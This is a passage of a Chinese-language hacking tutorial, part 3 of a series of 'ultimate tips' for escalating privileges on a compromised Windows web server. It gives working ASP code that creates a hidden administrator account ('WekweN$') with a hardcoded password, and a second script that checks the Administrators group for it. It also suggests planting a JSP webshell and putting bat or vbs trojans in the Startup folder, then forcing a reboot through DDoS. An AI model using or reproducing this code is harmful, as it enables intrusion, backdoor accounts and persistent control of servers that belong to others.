提升(web)权限终极9技巧(3)

7.还可以用这段代码试提升，好象效果不明显 
<<%Response.Expires=0">%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.CreateObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.Create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码 
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%> 

用这段代码检查是否提升成功 
<%@codepage=936%> 
<%Response.Expires=0 
on error resume next '查找Administrators组帐号 
Set tN=server.CreateObject("Wscript.Network") 
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") 
For Each admin in objGroup.Members 
Response.write admin.Name&"<br>" 
Next 
if err then 
Response.write "不行啊:Wscript.Network" 
end if 
%> 
8.C:\Program Files\Java Web Start这里如果可以，一般很小，可以尝试用jsp的webshell，听说权限很小，本人没有遇见过。 
9.最后了，如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。 
等到主机重启或者你ddos逼它重启，来达到权限提升的目的。